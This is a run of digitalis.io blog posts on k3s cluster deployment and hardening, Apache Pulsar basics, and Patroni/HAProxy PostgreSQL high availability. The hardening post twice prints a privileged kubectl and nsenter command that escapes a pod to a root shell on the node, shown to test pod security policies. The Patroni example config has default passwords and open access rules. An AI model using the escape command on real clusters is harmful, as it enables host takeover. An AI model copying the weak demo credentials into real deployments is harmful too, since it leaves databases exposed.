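  name: global-restricted-psp
roleRef:
  kind: ClusterRole
  name: global-restricted-psp
  apiGroup: rbac.authorization.k8s.io
subjects:
  - kind: Group
    name: system:serviceaccounts
    apiGroup: rbac.authorization.k8s.io
  - kind: Group
    name: system:authenticated
    apiGroup: rbac.authorization.k8s.io
  - kind: Group
    name: system:unauthenticated
    apiGroup: rbac.authorization.k8s.io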
We also want to disable automountServiceAccountToken for all namespaces. By default kubernetes enables it, and any POD will mount the default service account token inside it at /var/run/secrets/kubernetes.io/serviceaccount/token. This is dangerous, as reading this token automatically gives an attacker the ability to query the kubernetes APIs as an authenticated user.
To remediate we simply run
- name: Fetch namespace names
  shell: |
    set -o pipefail
    {{ kubectl_cmd }} get namespaces -A | tail -n +2 | awk '{print $1}'
  changed_when: no
  register: namespaces

# CIS - 5.1.5 - 5.1.6
- name: Security - Ensure that default service accounts are not actively used
  command: |
    {{ kubectl_cmd }} patch serviceaccount default -n {{ item }} -p \
      'automountServiceAccountToken: false'
  register: kubectl
  changed_when: "'no change' not in kubectl.stdout"
  failed_when: "'no change' not in kubectl.stderr and kubectl.rc != 0"
  run_once: yes
  with_items: "{{ namespaces.stdout_lines }}"
In the end the cluster will adhere to the CIS rulings referenced above.
So now we have a cluster that is also fully compliant with the CIS Benchmark for Kubernetes. Did this have any effect?
Let’s try our POD escaping again
~ $ kubectl-user apply -f demo/privileged-deploy.yaml
deployment.apps/privileged-deploy created
~ $ kubectl-user get pods
No resources found in unprivileged-user namespace.
~ $ kubectl-user get rs
NAME DESIRED CURRENT READY AGE
privileged-deploy-8878b565b 1 0 0 108s
~ $ kubectl-user describe rs privileged-deploy-8878b565b | tail -n8
Conditions:
Type Status Reason
---- ------ ------
ReplicaFailure True FailedCreate
Events:
Type Reason Age From Message
---- ------ ---- ---- -------
Warning FailedCreate 54s (x15 over 2m16s) replicaset-controller Error creating: pods "privileged-deploy-8878b565b-" is forbidden: PodSecurityPolicy: unable to admit pod: [spec.securityContext.hostNetwork: Invalid value: true: Host network is not allowed to be used spec.securityContext.hostPID: Invalid value: true: Host PID is not allowed to be used spec.containers[0].securityContext.privileged: Invalid value: true: Privileged containers are not allowed]
So the POD is not allowed, PSPs are working!
We can even try a command that will not create a Replica Set but directly a POD, and attach to it.
~ $ kubectl-user run hostname-sudo --restart=Never -it --image overriden --overrides '
{
"spec": {
"hostPID": true,
"hostNetwork": true,
"containers": [
{
"name": "busybox",
"image": "alpine:3.7",
"command": ["nsenter", "--mount=/proc/1/ns/mnt", "--", "sh", "-c", "exec /bin/bash"],
"stdin": true,
"tty": true,
"resources": {"requests": {"cpu": "10m"}},
"securityContext": {
"privileged": true
}
}
]
}
}' --rm --attach
Result will be
Error from server (Forbidden): pods "hostname-sudo" is forbidden: PodSecurityPolicy: unable to admit pod: [spec.securityContext.hostNetwork: Invalid value: true: Host network is not allowed to be used spec.securityContext.hostPID: Invalid value: true: Host PID is not allowed to be used spec.containers[0].securityContext.privileged: Invalid value: true: Privileged containers are not allowed]
So we are now able to restrict unprivileged users from doing nasty stuff on our cluster.
What about the admin role? Does that command still work?
~ $ kubectl run hostname-sudo --restart=Never -it --image overriden --overrides '
{
"spec": {
"hostPID": true,
"hostNetwork": true,
"containers": [
{
"name": "busybox",
"image": "alpine:3.7",
"command": ["nsenter", "--mount=/proc/1/ns/mnt", "--", "sh", "-c", "exec /bin/bash"],
"stdin": true,
"tty": true,
"resources": {"requests": {"cpu": "10m"}},
"securityContext": {
"privileged": true
}
}
]
}
}' --rm --attach
If you don't see a command prompt, try pressing enter.
[root@worker01 /]#
So we now have a hardened cluster from base OS to the application level, but as shown above some edge cases still make it insecure.
What we will analyse in the last and final part of this blog series is how to use Sysdig’s Falco security suite to cover even admin roles and RCEs inside PODs.
All the playbooks are available in the Github repo on https://github.com/digitalis-io/k3s-on-prem-production
This is part 1 in a three part blog series on deploying k3s, a certified Kubernetes distribution from SUSE Rancher, in a secure and available fashion. A fully working Ansible project, https://github.com/digitalis-io/k3s-on-prem-production, has been made available to deploy and secure k3s for you.
If you would like to know more about how to implement modern data and cloud technologies, such as Kubernetes, into your business, we at Digitalis do it all: from cloud migration to fully managed services, we can help you modernize your operations, data, and applications. We provide consulting and managed services on Kubernetes, cloud, data, and DevOps for any business type. Contact us today for more information or learn more about each of our services here.
There are many advantages to running an on-premises kubernetes cluster: it can increase performance, lower costs, and sometimes cause fewer headaches. It also allows users who are unable to utilize the public cloud to operate in a “cloud-like” environment. It does this by decoupling dependencies and abstracting infrastructure away from your application stack, giving you the portability and the scalability that's associated with cloud-native applications.
There are obvious downsides to running your kubernetes cluster on-premises, as it's up to you to manage a series of complexities, from provisioning and upgrades to networking and storage.
And added to this there is the inherent complexity of running such a large orchestration application, with all of its components: the API server, controller manager, scheduler, kubelet, kube-proxy and etcd.
And ensuring that all of these components are correctly configured and talk to each other securely (TLS) and reliably.
But is there a simpler solution to this?
K3s is a fully CNCF (Cloud Native Computing Foundation) certified, compliant Kubernetes distribution by SUSE (formerly Rancher Labs) that is easy to use and focused on lightness.
To achieve that it is designed to be a single binary of about 45MB that completely implements the Kubernetes APIs. To ensure lightness they removed a lot of extra drivers that are not strictly part of the core, but still easily replaceable with external add-ons.
Being a single binary it's easy to install and bring up, and it internally manages a lot of the pain points of K8s, such as generating and distributing the TLS certificates between components.
So K3s doesn’t even need a lot of stuff on the base host, just a recent kernel and `cgroups`.
All of the other utilities are packaged internally, like containerd, Flannel, CoreDNS, Traefik and a service load balancer.
This leads to really low system requirements; just 512MB of RAM is required for a worker node.
Image Source: https://k3s.io/
K3s is a fully encapsulated binary that will run all the components in the same process. One of the key differences from full kubernetes is that, thanks to KINE, it supports not only Etcd to hold the cluster state, but also SQLite (for single-node, simpler setups) or external DBs like MySQL and PostgreSQL (have a look at this blog or this blog on deploying PostgreSQL for HA and service discovery)
The following setup will be performed on pretty small nodes.
We need to have a Highly Available, resilient, load-balanced and Secure cluster to work with. So without further ado, let’s get started with the base underneath, the Nodes. The following 3 part blog series is a detailed walkthrough on how to set up the k3s kubernetes cluster, with some snippets taken from the project’s Github repo: https://github.com/digitalis-io/k3s-on-prem-production
First things first, we need to lay out a compelling network layout for the nodes in the cluster. This will be split in two, EXTERNAL and INTERNAL networks.
This ensures that internal cluster-components communication is segregated from the rest of the network.
Another crucial set up is the firewalld one. The first thing is to ensure that firewalld uses the iptables backend, and not the nftables one, as the latter is still incompatible with kubernetes. This is done in the Ansible project like this:
- name: Set firewalld backend to iptables
  replace:
    path: /etc/firewalld/firewalld.conf
    regexp: FirewallBackend=nftables$
    replace: FirewallBackend=iptables
    backup: yes
  register: firewalld_backend
This will require a reboot of the machine.
Also we will need to set up zoning for the internal and external interfaces, and set the respective open ports and services.
For the internal network we want to open all the necessary ports for kubernetes to function (etcd on 2379/2380, the API server on 6443, the kubelet range 10250-10255, flannel VXLAN on 8472/udp and the NodePort ranges, as listed in the zone below).
And we want rich rules to ensure that the PODs network is whitelisted; this should be the final result
internal (active)
target: default
icmp-block-inversion: no
interfaces: eth0
sources:
services: cockpit dhcpv6-client mdns samba-client ssh
ports: 2379/tcp 2380/tcp 6443/tcp 80/tcp 443/tcp 7946/udp 7946/tcp 8472/udp 9099/tcp 10250-10255/tcp 30000-32767/tcp 30000-32767/udp
protocols:
masquerade: yes
forward-ports:
source-ports:
icmp-blocks:
rich rules:
rule family="ipv4" source address="10.43.0.0/16" accept
rule family="ipv4" source address="10.44.0.0/16" accept
rule protocol value="vrrp" accept
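Those rich rules can be added with the same firewalld Ansible module used elsewhere in the project; a sketch, with the zone and CIDRs taken from the output above:

- name: Add firewalld rich rules /pods and services networks
  firewalld:
    zone: internal
    rich_rule: rule family="ipv4" source address="{{ item }}" accept
    permanent: yes
    immediate: yes
    state: enabled
  with_items:
    - 10.43.0.0/16
    - 10.44.0.0/16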
For the external network we only want ports 80 and 443 and (only if needed) 6443 for the K8s APIs.
The final result should look like this
public (active)
target: default
icmp-block-inversion: no
interfaces: eth1
sources:
services: dhcpv6-client
ports: 80/tcp 443/tcp 6443/tcp
protocols:
masquerade: yes
forward-ports:
source-ports:
icmp-blocks:
rich rules:
Another important point is that SELinux should be embraced and not deactivated! The smart guys at SUSE Rancher provide the rules needed to make K3s work with SELinux enforcing. Just install it!
# Workaround to the RPM/YUM hardening
# being the GPG key enforced at rpm level, we cannot use
# the dnf or yum module of ansible
- name: Install SELINUX Policies  # noqa command-instead-of-module
  command: |
    rpm --define '_pkgverify_level digest' -i {{ k3s_selinux_rpm }}
  register: rpm_install
  changed_when: "rpm_install.rc == 0"
  failed_when: "'already installed' not in rpm_install.stderr and rpm_install.rc != 0"
  when:
    - "'libselinux' in ansible_facts.packages"
This assumes that SELinux is installed (RedHat/CentOS base); if it's not present, the playbook will skip all configs and references to SELinux.
To be intrinsically secure, a network environment must be properly designed and configured. This is where the Center for Internet Security (CIS) benchmarks come in. CIS benchmarks are a set of configuration standards and best practices designed to help organizations ‘harden’ the security of their digital assets, CIS benchmarks map directly to many major standards and regulatory frameworks, including NIST CSF, ISO 27000, PCI DSS, HIPAA, and more. And it’s further enhanced by adopting the Security Technical Implementation Guide (STIG).
All CIS benchmarks are freely available as PDF downloads from the CIS website.
Included in the project repo there is an Ansible hardening role which applies the CIS benchmark to the base OS of the node. Otherwise there are ready-to-use roles that are recommended to run against your nodes, like:
https://github.com/ansible-lockdown/RHEL8-STIG/
https://github.com/ansible-lockdown/RHEL8-CIS/
Having a correctly configured and secure operating system underneath kubernetes is surely the first step to a more secure cluster.
We’re going to set up a HA installation using the Embedded ETCD included in K3s.
To start is dead simple: we first run the K3s server command on the first node like this
K3S_TOKEN=SECRET k3s server --cluster-init
And then join the other master nodes to it with
K3S_TOKEN=SECRET k3s server --server https://<ip or hostname of server1>:6443
How does this translate to Ansible?
We just set up the first service, and subsequently the others
- name: Prepare cluster - master 0 service
  template:
    src: k3s-bootstrap-first.service.j2
    dest: /etc/systemd/system/k3s-bootstrap.service
    mode: 0400
    owner: root
    group: root
  when: ansible_hostname == groups['kube_master'][0]

- name: Prepare cluster - other masters service
  template:
    src: k3s-bootstrap-followers.service.j2
    dest: /etc/systemd/system/k3s-bootstrap.service
    mode: 0400
    owner: root
    group: root
  when: ansible_hostname != groups['kube_master'][0]

- name: Start K3s service bootstrap /1
  systemd:
    name: k3s-bootstrap
    daemon_reload: yes
    enabled: no
    state: started
  delay: 3
  register: result
  retries: 3
  until: result is not failed
  when: ansible_hostname == groups['kube_master'][0]

- name: Wait for service to start
  pause:
    seconds: 5
  run_once: yes

- name: Start K3s service bootstrap /2
  systemd:
    name: k3s-bootstrap
    daemon_reload: yes
    enabled: no
    state: started
  delay: 3
  register: result
  retries: 3
  until: result is not failed
  when: ansible_hostname != groups['kube_master'][0]
After that we will be presented with a working 3 node cluster; here is the expected output
NAME       STATUS   ROLES                       AGE     VERSION
master01   Ready    control-plane,etcd,master   2d16h   v1.20.5+k3s1
master02   Ready    control-plane,etcd,master   2d16h   v1.20.5+k3s1
master03   Ready    control-plane,etcd,master   2d16h   v1.20.5+k3s1
Once all the masters have joined, the playbook stops and removes the temporary bootstrap service and replaces it with the definitive K3s server service:
- name: Stop K3s service bootstrap
  systemd:
    name: k3s-bootstrap
    daemon_reload: no
    enabled: no
    state: stopped

- name: Remove K3s service bootstrap
  file:
    path: /etc/systemd/system/k3s-bootstrap.service
    state: absent

- name: Deploy K3s master service
  template:
    src: k3s-server.service.j2
    dest: /etc/systemd/system/k3s-server.service
    mode: 0400
    owner: root
    group: root

- name: Enable and check K3s service
  systemd:
    name: k3s-server
    daemon_reload: yes
    enabled: yes
    state: started
Another point is to have the masters in HA, so that APIs are always reachable. To do this we will use keepalived, setting up a VIP (Virtual IP) inside the Internal network.
We will need to set up the firewalld rich rule in the internal Zone to allow VRRP traffic, which is the protocol used by keepalived to communicate with the other nodes and elect the VIP holder.
- name: Install keepalived
  package:
    name: keepalived
    state: present

- name: Add firewalld rich rules /vrrp
  firewalld:
    rich_rule: rule protocol value="vrrp" accept
    permanent: yes
    immediate: yes
    state: enabled
The complete task is available in: roles/k3s-deploy/tasks/cluster_keepalived.yml
vrrp_instance VI_1 {
    state BACKUP
    interface {{ keepalived_interface }}
    virtual_router_id {{ keepalived_routerid | default('50') }}
    priority {{ keepalived_priority | default('50') }}
    ...
Now it’s time for the workers to join! It’s as simple as launching the command, following the task in roles/k3s-deploy/tasks/cluster_agent.yml
K3S_TOKEN=SECRET k3s agent --server https://<Keepalived VIP>:6443
- name: Deploy K3s worker service
  template:
    src: k3s-agent.service.j2
    dest: /etc/systemd/system/k3s-agent.service
    mode: 0400
    owner: root
    group: root

- name: Enable and check K3s service
  systemd:
    name: k3s-agent
    daemon_reload: yes
    enabled: yes
    state: restarted
And the cluster will now show the worker nodes joined:
NAME       STATUS   ROLES                       AGE     VERSION
master01   Ready    control-plane,etcd,master   2d16h   v1.20.5+k3s1
master02   Ready    control-plane,etcd,master   2d16h   v1.20.5+k3s1
master03   Ready    control-plane,etcd,master   2d16h   v1.20.5+k3s1
worker01   Ready    <none>                      2d16h   v1.20.5+k3s1
worker02   Ready    <none>                      2d16h   v1.20.5+k3s1
worker03   Ready    <none>                      2d16h   v1.20.5+k3s1
We also pass a few extra flags to the K3s service, enabling SELinux support and disabling the bundled Traefik and service load balancer:
--selinux
--disable traefik
--disable servicelb
As we will be using ingress-nginx and MetalLB respectively.
And we set it up so that it uses the internal network
--advertise-address {{ ansible_host }} \
--bind-address 0.0.0.0 \
--node-ip {{ ansible_host }} \
--cluster-cidr={{ cluster_cidr }} \
--service-cidr={{ service_cidr }} \
--tls-san {{ ansible_host }}
The cluster is up and running, now we need a way to use it! We have disabled traefik and servicelb previously to accommodate ingress-nginx and MetalLB.
MetalLB will be configured using layer2 and with two classes of IPs
apiVersion: v1
kind: ConfigMap
metadata:
  namespace: metallb-system
  name: config
data:
  config: |
    address-pools:
    - name: default
      protocol: layer2
      addresses:
      - {{ metallb_external_ip_range }}
    - name: metallb_internal_ip_range
      protocol: layer2
      addresses:
      - {{ metallb_internal_ip_range }}
So we will have room for two ingresses; the deploy files are included in the playbook. The important part is that we will have an internal and an external ingress: the internal ingress exposes services useful for the cluster or monitoring, while the external one serves services to the outside world.
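To make a Service draw its IP from a specific pool, MetalLB honours an address-pool annotation; a hedged sketch for the internal ingress controller's Service (names and labels here are assumptions):

apiVersion: v1
kind: Service
metadata:
  name: internal-ingress-nginx-controller
  namespace: internal-ingress-nginx
  annotations:
    metallb.universe.tf/address-pool: metallb_internal_ip_range
spec:
  type: LoadBalancer
  selector:
    app.kubernetes.io/name: ingress-nginx
  ports:
    - name: https
      port: 443
      targetPort: 443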
We can then simply deploy our ingresses for our services selecting the kubernetes.io/ingress.class
For example, an internal ingress:
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
  name: dashboard-ingress
  namespace: kubernetes-dashboard
  annotations:
    kubernetes.io/ingress.class: "internal-ingress-nginx"
    nginx.ingress.kubernetes.io/backend-protocol: "HTTPS"
spec:
  rules:
    - host: dashboard.192.168.122.200.nip.io
      http:
        paths:
          - path: /
            pathType: Prefix
            backend:
              service:
                name: kubernetes-dashboard
                port:
                  number: 443
And an external ingress:
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
  name: my-ingress
  namespace: my-service
  annotations:
    kubernetes.io/ingress.class: "ingress-nginx"
    nginx.ingress.kubernetes.io/backend-protocol: "HTTPS"
spec:
  rules:
    - host: my-service.192.168.1.200.nip.io
      http:
        paths:
          - path: /
            pathType: Prefix
            backend:
              service:
                name: my-service
                port:
                  number: 443
Let's look at the resource usage of the nodes:
Mem:       total   used    free    shared   buff/cache   available   CPU%
master01   1.8Gi   944Mi   112Mi   20Mi     762Mi        852Mi       3.52%
master02   1.8Gi   963Mi   106Mi   20Mi     748Mi        828Mi       3.45%
master03   1.8Gi   936Mi   119Mi   20Mi     763Mi        880Mi       3.68%
worker01   1.8Gi   821Mi   119Mi   11Mi     877Mi        874Mi       1.78%
worker02   1.8Gi   832Mi   108Mi   11Mi     867Mi        884Mi       1.45%
worker03   1.8Gi   821Mi   119Mi   11Mi     857Mi        894Mi       1.67%
Good! We now have a basic HA K3s cluster on our machines, and look at that resource usage! In just 1GB of RAM per node, we have a working kubernetes cluster.
But are we done yet? Not quite: we still need to secure the cluster and services before continuing!
In the next blog we will analyse how this cluster is still vulnerable to some types of attack and what best practices and remediations we will adopt to prevent this.
Remember – all of the Ansible playbooks for deploying everything are available for you to checkout on Github https://github.com/digitalis-io/k3s-on-prem-production
In my last Pulsar post I did a side by side comparison of Apache Kafka and Apache Pulsar. Let's continue looking at Pulsar a little closer; there are some really interesting things when it comes to topics and the options available.
As with Kafka, Pulsar lets you operate a standalone cluster so you can get a grasp of the basics. For this blog I'm going to assume that you have installed the Pulsar binaries; while you can operate Pulsar in a Docker container or via Kubernetes, I will not be covering those in this post.
In the bin directory of the Pulsar distribution is the pulsar command. This gives you control over starting a standalone cluster, or the Zookeeper, Bookkeeper and Pulsar broker components separately. I'm going to start a standalone cluster:
$ bin/pulsar standalone
After a few minutes you will see that the cluster is up and running.
11:02:06.902 [worker-scheduler-0] INFO org.apache.pulsar.functions.worker.SchedulerManager - Schedule summary - execution time: 0.042227224 sec | total unassigned: 0 | stats: {"Added": 0, "Updated": 0, "removed": 0}
{
"c-standalone-fw-localhost-8080" : {
"originalNumAssignments" : 0,
"finalNumAssignments" : 0,
"instancesAdded" : 0,
"instancesRemoved" : 0,
"instancesUpdated" : 0,
"alive" : true
}
}
In the comparison blog post I noted that where Kafka pulls messages from the brokers, Pulsar pushes messages out to consumers. Pulsar uses subscriptions to route messages from the brokers to any number of consumers that are subscribed. The read position of the log is handled by the brokers.
I’m going to create a basic consumer to the standalone cluster. In the bin directory there is a Pulsar client application that we can use without having to code anything, very similar to the Kafka console-producer and console-consumer applications.
$ bin/pulsar-client consume sales-trigger -s "st-subscription-1"
Let's break this command down a little bit: consume tells the client to act as a consumer, sales-trigger is the name of the topic to consume from, and the -s flag names the subscription, in this case st-subscription-1.
Once executed, you will see in the consumer application output that it has subscribed to the topic and is waiting for a message.
12:04:50.621 [pulsar-client-io-1-1] INFO org.apache.pulsar.client.impl.ConsumerImpl - [sales-trigger][st-subscription-1] Subscribing to topic on cnx [id: 0x049a4567, L:/127.0.0.1:63912 - R:localhost/127.0.0.1:6650], consumerId 0
12:04:50.664 [pulsar-client-io-1-1] INFO org.apache.pulsar.client.impl.ConsumerImpl - [sales-trigger][st-subscription-1] Subscribed to topic on localhost/127.0.0.1:6650 -- consumer: 0
You may have noticed that the topic hasn't been created yet; the consumer is up and running and waiting regardless. Now let's create the producer and send a message.
Opening another terminal window, I’m going to run the Pulsar client as a producer this time and send a single message.
$ bin/pulsar-client produce sales-trigger --messages "This is a test message"
When executed the producer will connect to the cluster and send the message, the output shows that the message was sent.
13:50:56.342 [main] INFO org.apache.pulsar.client.cli.PulsarClientTool - 1 messages successfully produced
If you are running your own consumer and producer, now take a look at the consumer and see what's happened: it has received the message from the broker and then cleanly exited.
----- got message -----
key:[null], properties:[], content:This is a test message
13:50:56.378 [main] INFO org.apache.pulsar.client.impl.PulsarClientImpl - Client closing. URL: pulsar://localhost:6650/
13:50:56.404 [pulsar-client-io-1-1] INFO org.apache.pulsar.client.impl.ConsumerImpl - [sales-trigger] [st-subscription-1] Closed consumer
13:50:56.409 [pulsar-client-io-1-1] INFO org.apache.pulsar.client.impl.ClientCnx - [id: 0x049a4567, L:/127.0.0.1:63912 ! R:localhost/127.0.0.1:6650] Disconnected
13:50:56.422 [main] INFO org.apache.pulsar.client.cli.PulsarClientTool - 1 messages successfully consumed
$
If you are used to Kafka you would expect your consumer client to wait for any more messages from the broker; with Pulsar, however, this is not the default behaviour of the client application.
Ideally the client consumer should keep running, awaiting more messages from the brokers. There is an additional flag in the client that can be set.
$ bin/pulsar-client consume sales-trigger -s "st-subscription-1" -n 0
The -n flag sets the number of messages to accept before the consumer disconnects from the cluster and closes. The default is 1 message; if set to 0 then no limit is applied and the consumer will accept any messages the brokers push to it.
Like the consumer, the producer can send multiple messages in one execution:
$ bin/pulsar-client produce sales-trigger --messages "This is a test message" -n 100
With the -n flag in the produce mode, the client will send one hundred messages to the broker.
15:01:03.339 [main] INFO org.apache.pulsar.client.cli.PulsarClientTool - 100 messages successfully produced
The active consumer will receive the messages and await more.
----- got message -----
key:[null], properties:[], content:This is a test message
----- got message -----
key:[null], properties:[], content:This is a test message
----- got message -----
key:[null], properties:[], content:This is a test message
----- got message -----
key:[null], properties:[], content:This is a test message
----- got message -----
key:[null], properties:[], content:This is a test message
You may have noticed in the consumer output that along with the content of the message are two other sections, a key and properties.
Each message can have a key; it is optional but highly advised. Properties are key/value pairs, and you can attach multiple properties by comma-separating them. Supposing I want an action property with some form of command, and the key to be the current Unix timestamp, the client invocation would look like the following:
$ bin/pulsar-client produce sales-trigger --messages "This is a test message" -n 100 -p action=create -k `date +%s`
As the consumer is still running, awaiting new messages, you will see the output with the key and properties.
----- got message -----
key:[1611328125], properties:[action=create], content:This is a test message
There are a few differences between Kafka and Pulsar when it comes to persistence of messages. By default Pulsar will assume a topic is persistent and will save messages to the Bookkeeper instances (called Bookies).
Whereas Kafka has a time to live for messages regardless of whether the consumer has read them or not (the default is seven days, or 168 hours), Pulsar will keep messages persisted until all subscribed consumers have successfully read them and acknowledged so back to the broker, at which point the messages are removed from storage.
Pulsar can be configured, and should be in production environments, to have a time-to-live (TTL) for messages held in persistent storage.
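For example, the TTL can be set per namespace with the admin tool; a minimal sketch, assuming the default public/default namespace and a TTL of one day (86400 seconds):
$ bin/pulsar-admin namespaces set-message-ttl public/default --messageTTL 86400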
If you wish for topic messages to be stored within memory and not to disk then non-persistent topics are available.
Creating non-persistent topics can be done from the client but requires the full namespace configuration.
$ bin/pulsar-client consume non-persistent://public/default/sales-trigger2 -s "st-subscription-2" -n 0
$ bin/pulsar-client consume persistent://public/default/sales-trigger2 -s "st-subscription-2" -n 0
The Pulsar admin client handles all aspects of the cluster from the command line; this includes brokers, bookies, topics and TTL configurations, and specific configurations for named subscriptions if required.
For now, let’s just list the topics I’ve been working with in this post:
$ bin/pulsar-admin topics list public/default
"non-persistent://public/default/sales-trigger2"
"persistent://public/default/sales-trigger"
This post should give you a basic starting point on how the Pulsar client and the standalone cluster work. Consumers and producers give us the backbone of a streaming application, with added features such as choosing whether a topic is persistent or non-persistent (in memory).
All this has been done from the command line; in a future post I'll look at putting a basic producer and consumer application together in code.
If you would like to know more about how to implement modern data, streaming and cloud technologies into your business, we at Digitalis do it all: from cloud migration to fully managed services, we can help you modernize your operations, data, streaming and applications. We provide consulting and managed services on cloud, data, and DevOps for any business type. Contact us for more information.
DevOps Engineer and Developer
With over 30 years of experience in software, customer loyalty data and big data, Jason now focuses his energy on Kafka and Hadoop. He is also the author of Machine Learning: Hands-On for Developers and Technical Professionals. Jason is considered a stalwart in the Kafka community and is a regular speaker on Kafka technologies, AI, and customer and client predictions with data.
The post Apache Pulsar standalone usage and basic topics appeared first on digitalis.io.
]]>The post Deploying PostgreSQL for High Availability with Patroni, etcd and HAProxy – Part 2 appeared first on digitalis.io.
]]>In the first part of this blog we configured an etcd cluster on top of three CentOS 7 servers. We had to tweak the operating system configuration in order to have everything running smoothly. In this post we’ll see how to configure Patroni using the running etcd cluster as a distributed configuration store (DCS) and HAProxy to route connections to the active leader.
The patroni configuration is a yaml file divided into sections, with each section controlling a specific part of patroni's behaviour. We'll save the patroni configuration file as /etc/patroni/patroni.yml.
Let’s have a look at the configuration file in detail.
The scope, namespace and name keys in the yml file control the node's cluster membership: scope is the name of the cluster, namespace is where the cluster is created within the DCS, and name is the identifier for the node.
This comes in quite handy if we have a dedicated DCS cluster with multiple patroni clusters configured. We can define either a namespace for each cluster or store multiple clusters within the same namespace.
Scope and namespace are the same across the three nodes; the name value must be unique within the cluster.
In our example we'll have the following settings:
# patroni01
scope: region_one
namespace: /patroni_test/
name: patroni01
# patroni02
scope: region_one
namespace: /patroni_test/
name: patroni02
# patroni03
scope: region_one
namespace: /patroni_test/
name: patroni03
The restapi dictionary defines the configuration for the REST API used by patroni. In particular, the key listen – this defines the address and the port where the REST API service listens. Similarly the key connect_address – this defines the address and port used by patroni for querying the REST API.
The restapi can be secured by defining the path to the certificate file and key using the certfile and keyfile configuration options. It’s also possible to configure authentication for the restapi using the authentication configuration option within restapi config.
In a production setting it would be recommended to enable the above security options. However, in our example the restapi is configured in a simple fashion with no security enabled, as below.
#patroni 01
restapi:
  listen: 192.168.56.40:8008
  connect_address: 192.168.56.40:8008
#patroni 02
restapi:
  listen: 192.168.56.41:8008
  connect_address: 192.168.56.41:8008
#patroni 03
restapi:
  listen: 192.168.56.42:8008
  connect_address: 192.168.56.42:8008
Obviously, the IP address is machine specific.
The etcd: configuration value is used to define the connection to the DCS if etcd is used. In our example we store all the participating hosts in the key hosts as a comma separated string.
The configuration in our example is the same on all of the patroni nodes and is the following
etcd:
  hosts: 192.168.56.40:2379,192.168.56.41:2379,192.168.56.42:2379
The bootstrap section is used during the bootstrap of the patroni cluster.
The contents of the dcs configuration are written into the DCS at the path /<namespace>/<scope>/config after the patroni cluster is initialized.
The data stored in the DCS is then used as the global configuration for all the members in the cluster and should be managed only by interacting via patronictl or REST API calls.
Some parameters like ttl, loop_wait etc. are dynamic and read from the DCS in a global fashion. Other parameters like postgresql.listen and postgresql.data_dir are local to the node and shall be set in the configuration file instead.
In our example we are setting up the bootstrap section in this way.
bootstrap:
  dcs:
    ttl: 10
    loop_wait: 10
    retry_timeout: 10
    maximum_lag_on_failover: 1048576
    postgresql:
      use_pg_rewind: true
      parameters:
  initdb:
    - encoding: UTF8
    - data-checksums
  pg_hba:
    - host replication replicator 0.0.0.0/0 md5
    - host all all 0.0.0.0/0 md5
  users:
The dcs section defines the behaviour of the check against the DCS to manage the primary status and the eventual new leader election.
We are also configuring the postgresql dictionary to initialize the cluster with certain parameters. The initdb list defines options to pass to initdb, during the bootstrap process (e.g. cluster encoding or the checksum usage).
The pg_hba list defines the entries in pg_hba.conf set after the cluster is initialized.
The users key defines additional users to create after initializing the new cluster. In our example it is empty.
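Had we wanted patroni to create an application user at bootstrap time, the users key would look something like the sketch below (the admin name, password and options are purely illustrative):
users:
  admin:
    password: admin_password
    options:
      - createrole
      - createdb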
The postgresql section defines the node specific settings. Our configuration is the following.
postgresql:
  listen: "*:6432"
  connect_address: patroni01:6432
  data_dir: /var/lib/pgsql/data/postgresql0
  bin_dir: /usr/pgsql-13/bin/
  pgpass: /tmp/pgpass0
  authentication:
    replication:
      username: replicator
      password: replicator
    superuser:
      username: postgres
      password: postgres
    rewind:
      username: rewind_user
      password: rewind
  parameters:
In particular the key listen is used by patroni to set the postgresql.conf parameters listen_addresses and port.
The key connect_address defines the address and the port through which Postgres is accessible from other nodes and applications.
The key data_dir is used to tell patroni the path of the cluster’s data directory.
The key bin_dir is used to tell patroni where the PostgreSQL binaries are located.
The key pgpass specifies the filename of the password authentication file used by patroni to connect to the running PostgreSQL database.
The authentication dictionary is used to define the connection parameters for the replication user, the super user and the rewind user if we are using pg_rewind to remaster an old primary.
In order to have patroni start automatically we need to set up a systemd unit file in /etc/systemd/system. We'll name our file patroni.service, with the following contents.
[Unit]
Description=Runners to orchestrate a high-availability PostgreSQL
After=syslog.target network.target
[Service]
Type=simple
User=postgres
Group=postgres
WorkingDirectory=/var/lib/pgsql
# Start the patroni process
ExecStart=/bin/patroni /etc/patroni/patroni.yml
# Send HUP to reload from patroni.yml
ExecReload=/bin/kill -s HUP $MAINPID
# only kill the patroni process, not its children, so it will gracefully stop postgres
KillMode=process
# Give a reasonable amount of time for the server to start up/shut down
TimeoutSec=30
# Do not restart the service if it crashes, we want to manually inspect database on failure
Restart=no
[Install]
WantedBy=multi-user.target
After the service file creation we need to make systemd aware of the new service.
Then we can enable the service and start it.
sudo systemctl daemon-reload
sudo systemctl enable patroni
sudo systemctl start patroni
As soon as we start the patroni service we should see PostgreSQL bootstrap on the first node.
We can monitor the process via patronictl with the following command:
patronictl -c /etc/patroni/patroni.yml list
The output is something like this:
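(illustrative output; the exact layout varies by patronictl version)
+ Cluster: region_one ----------+---------+---------+----+-----------+
| Member    | Host            | Role    | State   | TL | Lag in MB |
+-----------+-----------------+---------+---------+----+-----------+
| patroni01 | 192.168.56.40   | Leader  | running |  1 |           |
+-----------+-----------------+---------+---------+----+-----------+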
We can then start the patroni service on the other two nodes so the followers join the cluster. By default patroni will build the new replicas using pg_basebackup.
When all the nodes are up and running the patronictl command output will change in this way.
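(illustrative output; the exact layout varies by patronictl version)
+ Cluster: region_one ----------+---------+---------+----+-----------+
| Member    | Host            | Role    | State   | TL | Lag in MB |
+-----------+-----------------+---------+---------+----+-----------+
| patroni01 | 192.168.56.40   | Leader  | running |  1 |           |
| patroni02 | 192.168.56.41   | Replica | running |  1 |         0 |
| patroni03 | 192.168.56.42   | Replica | running |  1 |         0 |
+-----------+-----------------+---------+---------+----+-----------+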
In order to have the connection routed to the active primary we need to configure the HAProxy service in a proper way.
First we need HAProxy to listen for connections on the standard PostgreSQL port 5432. Then HAProxy should check the patroni REST API to determine which node is the primary.
This is done with the following configuration.
global
maxconn 100
defaults
log global
mode tcp
retries 2
timeout client 30m
timeout connect 4s
timeout server 30m
timeout check 5s
listen stats
mode http
bind *:7000
stats enable
stats uri /
listen region_one
bind *:5432
option httpchk
http-check expect status 200
default-server inter 3s fall 3 rise 2 on-marked-down shutdown-sessions
server patroni01 192.168.56.40:6432 maxconn 80 check port 8008
server patroni02 192.168.56.41:6432 maxconn 80 check port 8008
server patroni03 192.168.56.42:6432 maxconn 80 check port 8008
